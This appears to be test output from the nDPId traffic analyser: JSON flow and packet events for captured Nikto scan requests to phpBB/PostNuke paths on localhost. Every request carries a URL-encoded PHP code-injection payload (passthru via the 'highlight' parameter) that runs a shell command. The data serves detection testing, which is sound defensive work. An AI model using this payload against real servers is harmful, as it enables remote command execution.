-00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":650,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":650,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277745,"flow_last_seen":1576420277745,"flow_idle_time":7440000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420277745,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50862,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00877{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":650,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":650,"flow_packet_id":1,"flow_last_seen":1576420277745,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":363,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":363,"pkt_l4_len":329,"thread_ts_msec":1576420277745,"pkt":"AAAAAAAAAAAAAAAACABFAAFddiRAAEAGxXR\/AAABfwAAAcauH5DeiE8\/TEH5WoAYAED\/UQAAAQEICp1m\/xmdZv8ZR0VUIC9pbmRleC5waHA\/bmFtZT1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5MCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} -01214{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":650,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":650,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277745,"flow_last_seen":1576420277745,"flow_idle_time":7440000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420277745,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50862,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":651,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":651,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277746,"flow_last_seen":1576420277746,"flow_idle_time":7440000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277746,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50864,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00888{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":651,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":651,"flow_packet_id":1,"flow_last_seen":1576420277746,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":372,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":372,"pkt_l4_len":338,"thread_ts_msec":1576420277746,"pkt":"AAAAAAAAAAAAAAAACABFAAFmjyxAAEAGrGN\/AAABfwAAAcawH5C1dLY3dpi6dIAYAED\/WgAAAQEICp1m\/xqdZv8aR0VUIC9wb3N0bnVrZS9pbmRleC5waHA\/bmFtZT1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 
-01224{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":651,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":651,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277746,"flow_last_seen":1576420277746,"flow_idle_time":7440000,"flow_min_l4_payload_len":306,"flow_max_l4_payload_len":306,"flow_tot_l4_payload_len":306,"flow_avg_l4_payload_len":306,"midstream":1,"thread_ts_msec":1576420277746,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50864,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":652,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":652,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277747,"flow_last_seen":1576420277747,"flow_idle_time":7440000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":1,"thread_ts_msec":1576420277747,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50866,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00895{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":652,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":652,"flow_packet_id":1,"flow_last_seen":1576420277747,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":377,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":377,"pkt_l4_len":343,"thread_ts_msec":1576420277747,"pkt":"AAAAAAAAAAAAAAAACABFAAFrmeBAAEAGoap\/AAABfwAAAcayH5AmkqDEx1CXDIAYAED\/XwAAAQEICp1m\/xudZv8bR0VUIC9wb3N0bnVrZS9odG1sL2luZGV4LnBocD9uYW1lPUZvcnVtcyZmaWxlPXZpZXd0b3BpYyZ0PTImcnVzaD0lNjQlNjklNzImaGlnaGxpZ2h0PSUyNTI3LiU3MCU2MSU3MyU3MyU3NCU2OCU3MiU3NSUyOCUyNCU0OCU1NCU1NCU1MCU1ZiU0NyU0NSU1NCU1ZiU1NiU0MSU1MiU1MyU1YiU3MiU3NSU3MyU2OCU1ZCUyOS4lMjUyNyBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMTM5MCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} -01230{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":652,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":652,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277747,"flow_last_seen":1576420277747,"flow_idle_time":7440000,"flow_min_l4_payload_len":311,"flow_max_l4_payload_len":311,"flow_tot_l4_payload_len":311,"flow_avg_l4_payload_len":311,"midstream":1,"thread_ts_msec":1576420277747,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50866,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":653,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":653,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277749,"flow_last_seen":1576420277749,"flow_idle_time":7440000,"flow_min_l4_payload_len":305,"flow_max_l4_payload_len":305,"flow_tot_l4_payload_len":305,"flow_avg_l4_payload_len":305,"midstream":1,"thread_ts_msec":1576420277749,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50868,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00887{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":653,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":653,"flow_packet_id":1,"flow_last_seen":1576420277749,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":371,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":371,"pkt_l4_len":337,"thread_ts_msec":1576420277749,"pkt":"AAAAAAAAAAAAAAAACABFAAFlinpAAEAGsRZ\/AAABfwAAAca0H5BJbLNma4SLi4AYAED\/WQAAAQEICp1m\/x2dZv8dR0VUIC9tb2R1bGVzL2luZGV4LnBocD9uYW1lPUZvcnVtcyZmaWxlPXZpZXd0b3BpYyZ0PTImcnVzaD0lNjQlNjklNzImaGlnaGxpZ2h0PSUyNTI3LiU3MCU2MSU3MyU3MyU3NCU2OCU3MiU3NSUyOCUyNCU0OCU1NCU1NCU1MCU1ZiU0NyU0NSU1NCU1ZiU1NiU0MSU1MiU1MyU1YiU3MiU3NSU3MyU2OCU1ZCUyOS4lMjUyNyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzkwKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} 
-01223{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":653,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":653,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277749,"flow_last_seen":1576420277749,"flow_idle_time":7440000,"flow_min_l4_payload_len":305,"flow_max_l4_payload_len":305,"flow_tot_l4_payload_len":305,"flow_avg_l4_payload_len":305,"midstream":1,"thread_ts_msec":1576420277749,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50868,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":654,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":654,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277750,"flow_last_seen":1576420277750,"flow_idle_time":7440000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420277750,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50870,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00884{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":654,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":654,"flow_packet_id":1,"flow_last_seen":1576420277750,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":369,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":369,"pkt_l4_len":335,"thread_ts_msec":1576420277750,"pkt":"AAAAAAAAAAAAAAAACABFAAFjJWNAAEAGFjB\/AAABfwAAAca2H5CBThx9EGPplIAYAED\/VwAAAQEICp1m\/x6dZv8eR0VUIC9waHBCQi9pbmRleC5waHA\/bmFtZT1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01221{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":654,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":654,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277750,"flow_last_seen":1576420277750,"flow_idle_time":7440000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420277750,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50870,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":655,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":655,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277752,"flow_last_seen":1576420277752,"flow_idle_time":7440000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420277752,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50872,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00884{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":655,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":655,"flow_packet_id":1,"flow_last_seen":1576420277752,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":369,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":369,"pkt_l4_len":335,"thread_ts_msec":1576420277752,"pkt":"AAAAAAAAAAAAAAAACABFAAFjNwZAAEAGBI1\/AAABfwAAAca4H5DKtQ4b91nN3YAYAED\/VwAAAQEICp1m\/yCdZv8gR0VUIC9mb3J1bS9pbmRleC5waHA\/bmFtZT1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 
-01221{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":655,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":655,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277752,"flow_last_seen":1576420277752,"flow_idle_time":7440000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1576420277752,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50872,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":656,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":656,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277753,"flow_last_seen":1576420277753,"flow_idle_time":7440000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":298,"flow_tot_l4_payload_len":298,"flow_avg_l4_payload_len":298,"midstream":1,"thread_ts_msec":1576420277753,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50874,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00880{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":656,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":656,"flow_packet_id":1,"flow_last_seen":1576420277753,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":364,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":364,"pkt_l4_len":330,"thread_ts_msec":1576420277753,"pkt":"AAAAAAAAAAAAAAAACABFAAFeFwdAAEAGJJF\/AAABfwAAAca6H5C+9y4cicj8j4AYAED\/UgAAAQEICp1m\/yGdZv8hR0VUIC9pbmRleC5waHA\/TmlrdG89Rm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzkwKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01215{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":656,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":656,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277753,"flow_last_seen":1576420277753,"flow_idle_time":7440000,"flow_min_l4_payload_len":298,"flow_max_l4_payload_len":298,"flow_tot_l4_payload_len":298,"flow_avg_l4_payload_len":298,"midstream":1,"thread_ts_msec":1576420277753,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50874,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
{"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":657,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":657,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277754,"flow_last_seen":1576420277754,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277754,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50876,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00892{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":657,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":657,"flow_packet_id":1,"flow_last_seen":1576420277754,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":373,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":373,"pkt_l4_len":339,"thread_ts_msec":1576420277754,"pkt":"AAAAAAAAAAAAAAAACABFAAFnn4NAAEAGnAt\/AAABfwAAAca8H5BO76agHBQLN4AYAED\/WwAAAQEICp1m\/yKdZv8iR0VUIC9wb3N0bnVrZS9pbmRleC5waHA\/TmlrdG89Rm9ydW1zJmZpbGU9dmlld3RvcGljJnQ9MiZydXNoPSU2NCU2OSU3MiZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTApDQoNCg=="} 
-01225{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":657,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":657,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277754,"flow_last_seen":1576420277754,"flow_idle_time":7440000,"flow_min_l4_payload_len":307,"flow_max_l4_payload_len":307,"flow_tot_l4_payload_len":307,"flow_avg_l4_payload_len":307,"midstream":1,"thread_ts_msec":1576420277754,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50876,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/index.php?Nikto=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001390)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":658,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":658,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277756,"flow_last_seen":1576420277756,"flow_idle_time":7440000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277756,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50878,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00895{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":658,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":658,"flow_packet_id":1,"flow_last_seen":1576420277756,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":378,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":378,"pkt_l4_len":344,"thread_ts_msec":1576420277756,"pkt":"AAAAAAAAAAAAAAAACABFAAFsUT9AAEAG6kp\/AAABfwAAAca+H5B2qmgj3lZSb4AYAED\/YAAAAQEICp1m\/ySdZv8kR0VUIC9wb3N0bnVrZS9odG1sL2luZGV4LnBocD9OaWt0bz1Gb3J1bXMmZmlsZT12aWV3dG9waWMmdD0yJnJ1c2g9JTY0JTY5JTcyJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01231{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":658,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":658,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277756,"flow_last_seen":1576420277756,"flow_idle_time":7440000,"flow_min_l4_payload_len":312,"flow_max_l4_payload_len":312,"flow_tot_l4_payload_len":312,"flow_avg_l4_payload_len":312,"midstream":1,"thread_ts_msec":1576420277756,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50878,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
